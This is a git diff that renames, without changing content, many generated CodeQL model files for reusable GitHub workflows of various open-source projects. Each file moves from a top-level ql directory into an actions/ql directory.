diff --git a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml
